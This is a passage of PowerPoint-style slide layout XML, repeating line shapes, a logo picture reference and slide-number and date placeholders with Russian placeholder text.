          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Line 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468000" y="1412640"/>
            <a:ext cx="7128000" cy="1800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="sq" w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="-43200" bIns="-43200" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="72" name="Picture 8" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7786800" y="142920"/>
            <a:ext cx="1206000" cy="1283760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="19"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553080" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
              <a:defRPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{A54ED1BF-1628-4007-8423-3AA913108B6C}" type="slidenum">
              <a:rPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;номер&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="20"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="4680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7" r:id="rId3"/>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5" name="Text Box 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124080" y="6248520"/>
            <a:ext cx="2893320" cy="4550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76" name="Line 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7596000" y="166680"/>
            <a:ext cx="1440" cy="1245960"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="sq" w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="Line 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468000" y="1412640"/>
            <a:ext cx="7128000" cy="1800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="sq" w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="-43200" bIns="-43200" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="78" name="Picture 8" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7786800" y="142920"/>
            <a:ext cx="1206000" cy="1283760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="21"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553080" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
              <a:defRPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{8F0D0130-45C7-4E2C-9509-7E27811590A2}" type="slidenum">
              <a:rPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;номер&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="22"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="4680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9" r:id="rId3"/>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1" name="Text Box 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124080" y="6248520"/>
            <a:ext cx="2893320" cy="4550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82" name="Line 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7596000" y="166680"/>
            <a:ext cx="1440" cy="1245960"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="sq" w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="Line 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468000" y="1412640"/>
            <a:ext cx="7128000" cy="1800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="sq" w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="-43200" bIns="-43200" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="84" name="Picture 8" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7786800" y="214200"/>
            <a:ext cx="1255320" cy="1188360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="221040"/>
            <a:ext cx="8228880" cy="124992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Для правки текста заглавия щёлкните мышью</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553080" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
              <a:defRPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{D0E823C1-9E8D-4599-A9E4-6B6D1B154641}" type="slidenum">
              <a:rPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;номер&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="4680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1" r:id="rId3"/>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0" name="Text Box 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124080" y="6248520"/>
            <a:ext cx="2893320" cy="4550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91" name="Line 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7596000" y="166680"/>
            <a:ext cx="1440" cy="1245960"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="sq" w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92" name="Line 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468000" y="1412640"/>
            <a:ext cx="7128000" cy="1800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="sq" w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="-43200" bIns="-43200" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="93" name="Picture 8" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7786800" y="214200"/>
            <a:ext cx="1255320" cy="1188360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="25"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553080" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
              <a:defRPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{85CD21AE-06F6-42E5-9036-C2624A823C92}" type="slidenum">
              <a:rPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;номер&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="26"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="4680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3" r:id="rId3"/>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6" name="Text Box 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124080" y="6248520"/>
            <a:ext cx="2893320" cy="4550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97" name="Line 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7596000" y="166680"/>
            <a:ext cx="1440" cy="1245960"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="sq" w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="98" name="Line 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468000" y="1412640"/>
            <a:ext cx="7128000" cy="1800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="sq" w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="-43200" bIns="-43200" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="99" name="Picture 8" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7786800" y="214200"/>
            <a:ext cx="1255320" cy="1188360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="27"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553080" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
              <a:defRPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{A06EAC33-E038-4E68-819B-FAF3D1CFF033}" type="slidenum">
              <a:rPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;номер&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="28"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="4680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5" r:id="rId3"/>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2" name="Text Box 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124080" y="6248520"/>
            <a:ext cx="2893320" cy="4550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103" name="Line 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
